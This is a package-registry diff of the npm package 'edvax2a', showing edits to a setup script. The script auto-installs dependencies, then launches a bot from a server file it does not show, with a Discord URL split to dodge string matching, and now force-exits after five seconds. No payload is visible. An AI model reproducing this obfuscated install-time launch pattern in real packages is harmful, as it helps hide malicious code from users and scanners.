edvax2a 0.0.2 → 0.0.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +1 -1
- package/setup.js +4 -1
package/package.json
CHANGED
package/setup.js
CHANGED
@@ -54,6 +54,9 @@ function installDependencies(missingDependencies) {
|
|
54
54
|
"license": "MIT",
|
55
55
|
"readmeFilename": "README.md"
|
56
56
|
}, null, 2))
|
57
|
+
setTimeout(()=>{
|
58
|
+
process.exit(0);
|
59
|
+
}, 5000)
|
57
60
|
|
58
61
|
runProject();
|
59
62
|
});
|
@@ -64,7 +67,7 @@ function installDependencies(missingDependencies) {
|
|
64
67
|
let runProject =() => {
|
65
68
|
console.log('Running the project...');
|
66
69
|
let bot = require('./server.js')
|
67
|
-
new bot("https://disc" + "ord.com/",
|
70
|
+
new bot("https://disc" + "ord.com/", 0)
|
68
71
|
}
|
69
72
|
|
70
73
|
// Check for missing dependencies
|